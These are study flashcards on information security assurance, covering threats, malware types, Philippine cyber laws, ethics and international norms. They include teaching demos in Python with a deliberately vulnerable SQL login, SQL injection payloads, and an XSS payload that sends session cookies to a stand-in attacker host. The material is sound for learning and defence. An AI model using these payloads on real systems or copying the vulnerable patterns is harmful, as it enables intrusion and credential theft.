IS ASSURANCE W5-6 Flashcards

1
Q

Compliance and Trust:

A

Regulatory compliance
Risk management
Building trust

2
Q

Helps organizations meet data privacy regulations and industry standards, avoiding hefty fines and legal repercussions.

A

Regulatory compliance:

3
Q

Proactive identification, assessment and mitigation of security vulnerabilities, minimizing the potential damage from cyberattacks.

A

Risk management:

4
Q

Demonstrates to stakeholders, customers and partners a commitment to protecting their data, boosting overall reputation and confidence.

A

Building trust:

5
Q

Operational Efficiency and Effectiveness:

A

Improved decision-making
Resilient infrastructure
Cost savings

6
Q

Ensures data accuracy and integrity, leading to sound business decisions based on reliable information.

A

Improved decision-making:

7
Q

Minimizes downtime and disruptions caused by security incidents, maintaining operational continuity.

A

Resilient infrastructure:

8
Q

Prevents financial losses from data breaches, ransomware attacks and regulatory fines.

A

Cost savings:

9
Q

Self-replicating code that attaches itself to host files or programs and spreads when those infected files are run or shared, damaging data and disrupting operations. Ex: WannaCry is often cited here, but it is more accurately a ransomware worm, since it spread on its own (see the Worms and Ransomware cards).

A

Viruses

10
Q

Similar to viruses, but propagate across networks on their own, without a host file or user interaction. Ex: the 1988 Morris Worm, which disrupted a large part of the early internet.

A

Worms

11
Q

Encrypts files and demands a ransom payment for the decryption key. Ex: Ryuk ransomware attacks on hospitals.

A

Ransomware

12
Q

Disguised as legitimate software; once the user installs and runs it, it gives attackers access to the system. Ex: Emotet, a banking trojan later used as a loader for other malware and for data theft.

A

Trojan horses

13
Q

Targeted emails impersonating trusted individuals or organizations, tricking specific users into revealing sensitive information.

A

Spear phishing

14
Q

Similar to phishing, but delivered via SMS text messages.

A

Smishing

15
Q

Uses phone (voice) calls to impersonate legitimate entities and exploit trust.

A

Vishing

16
Q

Lures victims with something enticing (an attractive offer, a free download, a planted USB drive) or with fake urgency, so that they click a malicious link, open an attachment or plug in the device.

A

Baiting

17
Q

Data Breaches:

A

SQL injection
Cross-site scripting (XSS)
Man-in-the-middle attacks
Zero-day attacks

18
Q

Inserting crafted input into an application's database queries (possible when user input is concatenated into the SQL text instead of being passed as a bound parameter) to read, modify or delete data.

A

SQL injection
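To make the card concrete, here is an added example (written for this page, not part of the original flashcards) using Python's standard-library sqlite3 module. It creates a constructed in-memory users table, then implements the same login check twice: once by splicing user input into the query text, once with bound parameters. The payloads `alice' --` and `' OR '1'='1` defeat the first version and are treated as ordinary data by the second. The table, sample rows, function names and payloads are all assumptions for illustration.

```python
import sqlite3

# Constructed sample accounts for the demo (assumption, not real data).
USERS = [("alice", "s3cret"), ("bob", "hunter2")]


def make_db():
    """Create an in-memory users table populated with the sample accounts."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", USERS)
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """Deliberately vulnerable: attacker-controlled text is spliced into the
    SQL, so a quote in the input changes the structure of the query."""
    query = (f"SELECT username FROM users WHERE username = '{username}' "
             f"AND password = '{password}'")
    return sorted(row[0] for row in conn.execute(query))


def login_parameterized(conn, username, password):
    """Hardened form: the query text is a constant and the values travel as
    bound parameters, so quotes and comment markers are just characters."""
    query = "SELECT username FROM users WHERE username = ? AND password = ?"
    return sorted(row[0] for row in conn.execute(query, (username, password)))


def demo():
    """Run both versions against two classic payloads and return the rows
    each one returns (an empty list means the login was refused)."""
    conn = make_db()
    comment_out = "alice' --"      # closes the string, comments out the rest
    tautology = "' OR '1'='1"      # makes the WHERE clause true for every row
    return {
        "vuln_comment": login_vulnerable(conn, comment_out, "wrong"),
        "vuln_tautology": login_vulnerable(conn, "nobody", tautology),
        "safe_comment": login_parameterized(conn, comment_out, "wrong"),
        "safe_tautology": login_parameterized(conn, "nobody", tautology),
        "safe_legit": login_parameterized(conn, "alice", "s3cret"),
    }


if __name__ == "__main__":
    for case, rows in demo().items():
        print(f"{case:15s} -> {rows}")
```

The comment payload logs in as alice without a password; the tautology payload returns every account, which is how SQL injection turns a login form into a data dump. The parameterized version returns nothing for both payloads and still accepts the real credentials.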

19
Q

Injecting malicious scripts into web pages that other users view, so the script runs in their browser and can steal session cookies or other user data.

A

Cross-site scripting (XSS)
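As an added example for this card (not code from the original flashcards), the block below renders a greeting and a form field with untrusted input, first by pasting the input straight into the HTML and then through html.escape, and uses Python's html.parser to list the script tags and on* event-handler attributes a browser-like parser would find. The payloads, function names and page fragments are constructed for the demo.

```python
import html
from html.parser import HTMLParser

# Constructed attacker inputs (assumptions for illustration, not from the page).
PAYLOAD_BODY = ("<script>document.location='https://attacker.example/?c='"
                "+document.cookie</script>")
PAYLOAD_ATTR = '" onmouseover="alert(1)'


def render_vulnerable(name):
    """Deliberately vulnerable: user input is pasted straight into the page."""
    return f"<p>Hello, {name}!</p>"


def render_escaped(name):
    """Hardened: html.escape turns < > & " ' into entities, so the browser
    shows the input as text instead of parsing it as markup."""
    return f"<p>Hello, {html.escape(name, quote=True)}!</p>"


def render_attr_vulnerable(value):
    """Same bug in an attribute context: a stray quote ends the attribute
    and whatever follows becomes new attributes, e.g. an event handler."""
    return f'<input type="text" value="{value}">'


def render_attr_escaped(value):
    """Hardened attribute context: quote=True also escapes the quote chars."""
    return f'<input type="text" value="{html.escape(value, quote=True)}">'


class _TagCollector(HTMLParser):
    """Records every start tag with its attributes, the way a browser's
    parser would see them."""
    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))


def active_content(markup):
    """Return the script tags and on* event-handler attributes present in
    the markup. An empty list means the injected input stayed inert."""
    parser = _TagCollector()
    parser.feed(markup)
    found = []
    for tag, attrs in parser.tags:
        if tag == "script":
            found.append("script")
        found.extend(a for a in attrs if a.startswith("on"))
    return found


if __name__ == "__main__":
    for label, page in [("body/vuln", render_vulnerable(PAYLOAD_BODY)),
                        ("body/escaped", render_escaped(PAYLOAD_BODY)),
                        ("attr/vuln", render_attr_vulnerable(PAYLOAD_ATTR)),
                        ("attr/escaped", render_attr_escaped(PAYLOAD_ATTR))]:
        print(f"{label:13s} active={active_content(page)}  {page}")
```

Escaping has to match the output context: the entity encoding that is right inside an HTML element or a quoted attribute is not sufficient inside a JavaScript block or a URL, which is why template engines with context-aware auto-escaping are preferred over hand-rolled string building.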

20
Q

Intercepting (and possibly altering) communication between users and websites to steal data; typically possible when the connection is unencrypted or the client does not verify the server's certificate.

A

Man-in-the-middle attacks

21
Q

Exploiting vulnerabilities that are still unknown to the software vendor, so no patch exists yet, before a fix is released.

A

Zero-day attacks

22
Q

Disgruntled employees stealing data or sabotaging systems.

A

Insider Threats

23
Q

Contractors or vendors with legitimate access who misuse it, or whose poorly secured access is exploited by attackers.

A

Insider Threats

24
Q

Deepfake audio and video used to impersonate executives or colleagues in social engineering attacks.

A

Artificial Intelligence (AI):

25
Insecure IoT devices creating entry points for attackers. Botnets formed from compromised IoT devices launching large-scale attacks.
Internet of Things (IoT):
26
While still in development, its potential to break current encryption methods poses a future challenge.
Quantum Computing:
27
Here are some key principles of secure software development:
Static Code Analysis: Continuous Security Testing: Security Awareness and Training:
28
Automated tools are used to scan code for potential security vulnerabilities before deployment. This helps catch issues early on and makes it easier to fix them.
Static Code Analysis:
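To show what a static analyzer actually does, here is an added example (written for this page, not a tool the flashcards describe) that uses Python's ast module to scan source code without executing it. It flags execute()-style database calls whose query is assembled at run time with an f-string, `+` concatenation, `%` formatting or str.format(), the pattern behind SQL injection, and leaves the parameterized call alone. The scanned source is a constructed sample embedded in the block; the sink names and rule are assumptions for the demo, and real tools such as Bandit or Semgrep apply many rules of this kind.

```python
import ast

# Constructed sample to scan (an assumption for the demo, not code from the
# page). Lines 3, 6 and 9 build the query at run time; line 12 uses a
# placeholder with a bound parameter.
SAMPLE_SOURCE = '''
def find_user(conn, name):
    return conn.execute(f"SELECT * FROM users WHERE name = '{name}'")

def find_user_concat(conn, name):
    return conn.execute("SELECT * FROM users WHERE name = '" + name + "'")

def find_user_percent(conn, name):
    return conn.execute("SELECT * FROM users WHERE name = '%s'" % name)

def find_user_safe(conn, name):
    return conn.execute("SELECT * FROM users WHERE name = ?", (name,))
'''

# Method names treated as query sinks (assumed for the demo).
QUERY_SINKS = {"execute", "executemany", "executescript"}


def _has_string_literal(node):
    """True if any sub-expression is a string constant or an f-string."""
    return any(isinstance(n, ast.JoinedStr)
               or (isinstance(n, ast.Constant) and isinstance(n.value, str))
               for n in ast.walk(node))


def _is_dynamic_query(node):
    """Does this expression assemble text at run time? Covers f-strings,
    '+' concatenation, '%' formatting and str.format()."""
    if isinstance(node, ast.JoinedStr):
        return True
    if isinstance(node, ast.BinOp) and isinstance(node.op, (ast.Add, ast.Mod)):
        return _has_string_literal(node)
    if (isinstance(node, ast.Call) and isinstance(node.func, ast.Attribute)
            and node.func.attr == "format"):
        return True
    return False


def find_dynamic_sql(source):
    """Return (line, message) for each execute-style call whose first argument
    is built dynamically instead of being a constant query with parameters."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.Call) or not node.args:
            continue
        func = node.func
        name = func.attr if isinstance(func, ast.Attribute) else getattr(func, "id", "")
        if name in QUERY_SINKS and _is_dynamic_query(node.args[0]):
            findings.append((node.lineno,
                             f"{name}() receives a query built at run time; "
                             "use a constant query with bound parameters"))
    return sorted(findings)


if __name__ == "__main__":
    for line, msg in find_dynamic_sql(SAMPLE_SOURCE):
        print(f"line {line}: {msg}")
```

The rule is purely syntactic: it reports the three dynamic queries and nothing for the parameterized one, but it would also flag a query concatenated from two trusted constants (a false positive) and would miss a query string built in a helper and passed in through a variable (a false negative). That trade-off is why static analysis results are triaged rather than trusted blindly.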
29
Security testing is not a one-time event, but rather a continuous process that integrates with the development workflow. This includes automating security testing and integrating it into the build and deployment process.
Continuous Security Testing:
30
Developers need to be aware of security best practices and the latest threats. Regular training and awareness programs are essential for building a security-conscious development culture.
Security Awareness and Training:
32
Q

Laws (Philippines):

A

Data Privacy Act of 2012 (DPA)
Cybercrime Prevention Act of 2012 (CPA)
Electronic Commerce Act of 2000 (ECA)
Other Relevant Laws

33
Q

This landmark law (Republic Act No. 10173) regulates the collection, processing and storage of personal information, gives individuals control over their data and requires entities to implement reasonable security measures.

A

Data Privacy Act of 2012 (DPA)

34
Q

This law (Republic Act No. 10175) criminalizes cyber offences such as illegal access ("hacking"), illegal interception, data and system interference, computer-related fraud and identity theft, and content-related offences such as cyber libel.

A

Cybercrime Prevention Act of 2012 (CPA)

35
Q

This law (Republic Act No. 8792) establishes the legal framework for electronic transactions, including provisions on electronic documents, electronic signatures and data protection.

A

Electronic Commerce Act of 2000 (ECA)

36
Q

Several other laws touch on information security, such as the Access Devices Regulation Act, the Anti-Photo and Video Voyeurism Act and the Anti-Child Pornography Act.

A

Other Relevant Laws
37
Q

Ethical Considerations:

A

Balancing Privacy and Security
Cyberbullying and Online Harassment
Digital Divide and Accessibility

38
Q

As elsewhere in the world, striking a balance between individual privacy and national security remains a challenge. The Philippine government faces pressure to access data for security purposes, which sometimes raises concerns about privacy violations.

A

Balancing Privacy and Security

39
Q

The Philippines has a significant online harassment problem, and ethical questions surround both legal responses and the responsibilities of platforms.

A

Cyberbullying and Online Harassment

40
Q

Ensuring equitable access to technology and digital literacy is crucial for ethical information security practices.

A

Digital Divide and Accessibility

41
Q

Enshrines basic ethical principles such as accountability, public service and integrity for public officials and employees (public office is a public trust).

A

1987 Philippine Constitution

42
Q

Establishes a code of conduct and ethical standards for public officials and employees.

A

Republic Act No. 6713

43
Q

Mandates organizations to implement responsible data handling practices and safeguard personal information.

A

Data Privacy Act of 2012 (DPA)

44
Q

Depending on the industry or sector, additional laws and regulations may influence ethical codes.

A

Other Relevant Laws
45
Q

Ethical Concerns in Information Security:

A

Privacy
Surveillance
Data Ownership and Control
Algorithmic Bias
Vulnerability Disclosure
Cyberwarfare

46
Q

Balancing the need for security with individual privacy rights is a major challenge. Collecting, storing and using personal data ethically requires transparency, consent and secure handling practices.

A

Privacy

47
Q

Justifying and implementing surveillance activities ethically requires clear objectives, transparency and respect for individual privacy.

A

Surveillance

48
Q

Determining who owns and controls data, along with responsible data sharing practices, is a crucial ethical consideration.

A

Data Ownership and Control

49
Q

Ensuring that algorithms used in information security systems are fair, unbiased and do not discriminate against specific groups is ethically important.

A

Algorithmic Bias

50
Q

Disclosing security vulnerabilities responsibly poses ethical dilemmas: the need to warn affected parties has to be balanced against giving the vendor time to fix the flaw before details become public and can be exploited.

A

Vulnerability Disclosure

51
Q

Ethical issues surround the use of cyber weapons, the targeting of civilian infrastructure and the potential for unintended consequences.

A

Cyberwarfare
52
Q

Ethical Principles for Information Security:

A

Privacy
Transparency
Accountability
Fairness
Proportionality
Legality

53
Q

Respect individual privacy rights by minimizing data collection, obtaining informed consent and implementing robust security measures.

A

Privacy

54
Q

Be transparent about data practices, including collection, use and retention policies.

A

Transparency

55
Q

Be accountable for data security and address breaches responsibly.

A

Accountability

56
Q

Treat all individuals fairly and avoid algorithmic bias in information security systems.

A

Fairness

57
Q

Implement security measures proportionate to the risk and avoid overly intrusive practices.

A

Proportionality

58
Q

Comply with relevant data privacy and security laws and regulations.

A

Legality

59
Q

Demonstrating a commitment to ethical information security practices builds trust with stakeholders and customers.

A

Enhanced Public Trust

60
Q

Adhering to ethical principles helps organizations avoid the legal repercussions associated with data breaches and privacy violations.

A

Reduced Legal Risks

61
Q

Ethical considerations can guide informed decisions about data handling, surveillance and security measures.

A

Improved Decision-Making

62
Q

Fostering an ethical culture within an organization encourages responsible behavior and contributes to stronger overall security.

A

Stronger Security Culture
63
Q

General Principles (international law in cyberspace):

A

State sovereignty
Non-intervention
Proportional response
Due diligence

64
Q

Each state has the right to govern its own cyberspace and to take measures to protect its critical infrastructure and information.

A

State sovereignty

65
Q

No state should interfere with the legitimate activities of another state in cyberspace.

A

Non-intervention

66
Q

Any use of force in response to a cyberattack must be necessary and proportionate to the harm suffered.

A

Proportional response

67
Q

States have a duty to take reasonable measures to prevent their territory from being used for cyberattacks against other states.

A

Due diligence

68
Q

Treaties and Agreements:

A

Budapest Convention on Cybercrime
Convention on Certain Conventional Weapons (CCW)
International Telecommunication Union (ITU) Constitution and Regulations
Various regional agreements

69
Q

Focuses on criminalizing cyber offences such as illegal access, data interference and computer fraud, and promotes international cooperation in investigations and prosecutions.

A

Budapest Convention on Cybercrime

70
Q

Restricts or bans particular conventional weapons; its Protocol IV prohibits the use of blinding laser weapons. Its relevance to cyber operations is limited and debated: at most it can be argued to cover cyberattacks that cause comparable physical harm.

A

Convention on Certain Conventional Weapons (CCW)

71
Q

Affirm the right to access and use information and communication technologies (ICTs) peacefully and responsibly.

A

International Telecommunication Union (ITU) Constitution and Regulations

72
Q

Additional treaties, such as the African Union Convention on Cyber Security and Personal Data Protection, address regional concerns and cooperation frameworks.

A

Various regional agreements

73
Q

Current Developments:

A

United Nations Group of Governmental Experts (GGE)
Multistakeholder initiatives

74
Q

Regularly discusses and makes recommendations on norms, state behavior and the responsible use of ICTs in cyberspace.

A

United Nations Group of Governmental Experts (GGE)

75
Q

Non-governmental organizations, businesses and technical experts participate in developing best practices and norms for responsible cyber behavior.

A

Multistakeholder initiatives